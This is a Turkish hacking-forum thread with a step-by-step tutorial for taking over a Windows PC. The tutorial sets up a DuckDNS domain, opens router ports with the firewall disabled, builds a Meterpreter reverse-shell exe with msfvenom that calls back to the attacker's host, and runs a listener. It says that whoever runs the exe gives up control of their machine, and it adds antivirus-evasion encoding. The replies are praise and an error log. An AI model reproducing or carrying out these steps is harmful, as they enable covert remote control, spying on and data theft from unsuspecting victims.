Kali Linux Uzak ve Local PC Bağlantısı [ SIZMA ]

Fliqpy

Üye
2 Ocak 2016
204
0
1. Adım : https://www.duckdns.org/ Adresine girişimizi yapıyoruz.
J6kD8.png


2. Adım : Domains kısmından sub domain yazan yere herhangi birşey yazın örneğin ben fliqpy yazdım.

3. Adım : add domain tıklayın.
J6n8H.png

4. Adım : https://www.duckdns.org/install.jsp Adresinden linux GUI seçeneğine tıklıyoruz.
J6obj.png

5. Adım : first step - choose a domain. kısmından daha demin oluşturduğumuz domain'imizi seçiyoruz.

6. Adım : linux gui versiyon yazan yere tıklıyoruz.Sayfanın biraz altındadır.Bu dosyayı bilgisayarımıza indirelim.Masaüstünüze atmanızı tavsiye ederim.
J6QoA.png

7. Adım : Terminalimizi açalım.

Masaüstümüze gelelim.cd Desktop veyahut cd Masaüstü bilgisayarınızın diline göre değişir.

yetki vericez az önce indirdiğimiz dosyaya.

chmod +x az önce indirdiğimiz dosyanın adı.

bende duck-setup-gui.sh dolayısıyla chmod +x duck-setup-gui.sh yazıyorum.

muhtemelen sizdede ismi aynıdır.

./duck-setup-gui.sh daha deminki gibi ./ komutundan sonra dosya adımızı giriyoruz.

oluşturmuş olduğumuz duckdns adresimizi ister.

bende fliqpy.duckdns.org
J6yqI.png

token değerinizi ister.

Duck DNS adresinde yani anasayfadan bakabilirsiniz.
J6rL1.png

şimdide bu token değerimizi girdik.
J6xGS.png

Next diyoruz.

Done diyoruz. terminalde herhangi bir hata vermediyse ve 100 yazıyorsa %total kısmının altında işlem tamam demektir.Herhangi bir hata yapmamışsanız şayet zaten hata vermiyecektir.

Masaüstünüzde indirmş olduğunun dosyayı artık silebilirsiniz işlemimiz tamamdır.

Home kısmından duckdns klasörünü görürsünüz.

içerisinde duck.log ve duck.sh olması gerekli.

8. Adım : cd duckdns yazalım.

ls yazalım ve içerisindekileri görelim.

./duck.sh yazalım. şayet yeşil renkteyse yeşil renkte değilse yetki verelim.
J6C0f.png

9. Adım : Terminale ifconfig yazarak local ip'nize bakın.bilgisayarınız wlan ile bağlantı kurmuş ise wlan kısmında ethernet kablosu ile kurmuş ise ethernet kısmında görürsünüz.Örnek bir ip 192.168.1.2 benimki sizinkide buna benzer birşeydir sondaki rakamı değişiktir tahminimce veya aynıdır.
J6Trs.png

10. Adım : Tarayıcımızı açalım ve modem arayüzümüze girmek için 192.168.1.1 yazalım adres çubuğumuza. kullanıcı adı şifre girdikten sonra modem arayüzümüze ulaştık.ben Huwai modemler için anlatıcam.şayet siz başka bir modem kullanıyorsanız internetten araştırın.yapacağımız işlem port açmak olacaktır.

Gelişmiş seçeneğine tıklıyoruz.
NAT yazan bölüme tıklıyoruz.
DMZ kısmına local ip'nizi yazıyorsunuz dediğim gibi benimki 192.168.1.2 olduğundan ben böyle yazıyorum.
J6u5G.png

Port eşleştirme kısmından Protokol TCP/UDP yapalım.Host yazan her kısıma local ip'mizi yazıyoruz.Port yazan her kısıma ise bu port farketmez lakin buraya yazdığınız portu daha sonrada kullanacağımız için her işlemde portumuz aynı olmalı yani o portu kullanın her zaman için.ben 443 yazıyorum.
J6YhQ.png

Port tetikleme kısmındada host yazan yerlere local ip'nizi port yazan yerlere portu ve protokolümüz yeniden TCP/UDP olacak şekilde ayarlıyoruz.
J6LEc.png

Güvenlik duvarı kısmına geliyoruz. burada güvenlik duvarı kısmından kapalıyı seçmenizi öneririm.
J6a8t.png


Her yaptığınız işlemde gönder kısmına tıklıyoruz tabikide.

Burada işimiz bu kadar.

11. Adım : Duckdns bağlantınızı denemek adına modemi açıp kapattıktan sonra terminalden tekrardan
cd duckdns
./duck.sh
yazıyoruz ve Duck DNS adresinden sayfayı bir yenileyin oradaki ip değişmiş ise işlemimiz sorunsuz bir şekilde tamamlanmış demektir.

12. Adım : Payload oluşturma işlemini anlatıyor olucam şimdi size.

Terminalimizi açalım
msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=fliqpy.duckdns.org LPORT=443 -f exe > /root/Desktop/deneme.exe
J6j7N.png

NOT: Şayet siz aynı ağ üzerindeki bir pc 'ye bu işlemi yapmıyacaksanız yani aynı ağ üzerindeki başka bir bilgisayara atmıyacaksanız bu payload'ı napıyoruz. o zaman da LHOST yerine RHOST yazıyoruz.RHOST kısmınada karşı tarafın ipsini yazıyoruz diye biliyorum şahsen emin değilim.Lakin böyleydi sanırım.
Burada dikkat etmeniz gereken şeyleri sizlere söyliyeyim.
LHOST kısmına kendi oluşturduğunuz adresi yazıcaksınız.
LPORT kısmına kendi seçtiğiniz portu yazıcaksınız.Modem arayüzünde oluşturduğunuz portu.
Bilgisayarınızın diline göre Desktop yerine Masaüstü yazmanız gerekebilir buna dikkat edeceksiniz.
Birde kodları doğru yazın sizden başka birşey istemiyorum :) zaten yanlış yapmışsanız uzunca bir satır gelir anlayınki yanlış yapmışsınız.
Masaüstümüze payloadımızın gelmiş olması gerekli.

13.Adım : Terminalimizi açalım.
msfconsole yazarak msfKonsolumuzu açalım.

payloadı dinlemek adına

use multi/handler

set payload windows/meterpreter/reverse_tcp_dns

set lhost 192.168.1.2

set lport 443

run
J6Oqe.png

Burada dikkat etmemiz gereken şey lhost kısmına kendi ipmizi yazıyor olmamız.kendi local ip'mizi . ve tekrardan belirtmekte fayda var lhost yerine payload oluştururken rhost yazdıysanız.ona göre işlemizini yapın.
Yani kısacası payload oluştururken'ki bilgileri buraya yazıyoruz ki oluşturduğumuz payloadı dinleyelim.
Mesela bir telefonu aramak için telefon numarasını yazıyorsunuz.Buradada payload'ı dinlemek için bu bilgileri doğru bir şekilde yazıyoruz.

Şimdi artık exe dosyasını yani payloadı attığınız kişi bu exe dosyasını çalıştırdığında karşı tarafın pc'sine sahipsiniz demektir.

help yazarak neler yapabileceğinizi görürsünüz.

eğer kendi bilgisayarınıza attıysanız.denemeniz adına birkaç bilgi vereyim.

screenshot yazarak ss alabilirsiniz.ve ss'iniz sizin bilgisayarınıza kaydedilir.
veyahut sysinfo yazarakta sistem bilgilerini görebilirsiniz.

Son olarak birşey söylemek istiyorum.Bu konuda encode yapmayı yani oluşturduğunuz payload'ı şifreleyerek virüs programlarına yakalanmamasını engellemedik bunun için biraz araştırma yaparak bunu öğrenebilirsiniz.

Size tavsiye etmeyeceğim şey ise -e -i parametreleri ile encode yapmayın o sistemler artık çokça kullanıldığından eskimiş ve virüs programları tarafından kolaylıkla yakalanıyor.şahsen 1000 yapmama rağmen yakalandı öyle denedim yinede onuda göstereyim bilginiz olsun bilginin zararı olmaz.

msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=fliqpy.duckdns.org LPORT=443 -f exe > root/Desktop/deneme.exe -e x86/shikata_ga_nai -i 10

LHOST kısmına kendi oluşturmuş olduğunuz dns'inizi

LPORT kısmına seçmiş olduğunuz portu

Desktop veya Masaüstü bilgisayarın diline göre

msfvenom -l encoder yazarak encoder'ları görebilir oradan istediğinizi seçebilirsiniz.ben x86/shikata_ga_nai olanı seçtim.

-i yani kaç kere üst üste encode'layacağını.

Zaman ayırdığınız için teşekkürler.Umarım işinize yarar.Takıldığınız yerlerde sorular sormayı unutmayın.İyi Günler.

Şahsen video bana ait değildir lakin videolu anlatımıda izlemek isterseniz gayet güzel anlatılmış bir videolu anlatımdır. [ame]https://www.youtube.com/watch?v=pPt0DowGriw[/ame]
 
Son düzenleme:

TheHacker4

Katılımcı Üye
25 Ağu 2010
645
1
Eskişehir
Kendini geliştriyosun bu konularda ama sana tavsiyem konu açarken görsel yada video şeklinde desteklersen daha açıklayıcı ve ilgi çekici olur kardeşim.
 

Fliqpy

Üye
2 Ocak 2016
204
0
Kendini geliştriyosun bu konularda ama sana tavsiyem konu açarken görsel yada video şeklinde desteklersen daha açıklayıcı ve ilgi çekici olur kardeşim.

Teşekkürler.Görsel ekleyecektim lakin böyle bir konuda görselin sadece okuyanı sıkmamak için olacağını düşündüm.Yani herşey çok açık ve basit olduğundan okuyan bir kaynak okurken sıkılıyorsa zaten bu işleri bırakması gerektiğini düşünüyorum.Yinede kendime ait bir video olmasada konuya eklendim Konu Güncellenmiştir.
 
Son düzenleme:

The Ariza

Üye
13 Ocak 2018
58
0
Mumbai
Güzel bir çalışma olmuş eline sağlık ama biraz uzun olduğu için görsel efektlerle veya farklı renklerle yazman daha dikkat çekici olabilir
 
Son düzenleme:

SeMiAut0

Üye
25 Haz 2016
118
0
eline sağlık ancak herşeyi eksiksiz yapmama rağmen şöyle bir hata alıyorum
Kod:
[-] Handler failed to bind to 192.168.1.30:443:-  -
[-] Handler failed to bind to 0.0.0.0:443:-  -
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:443
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.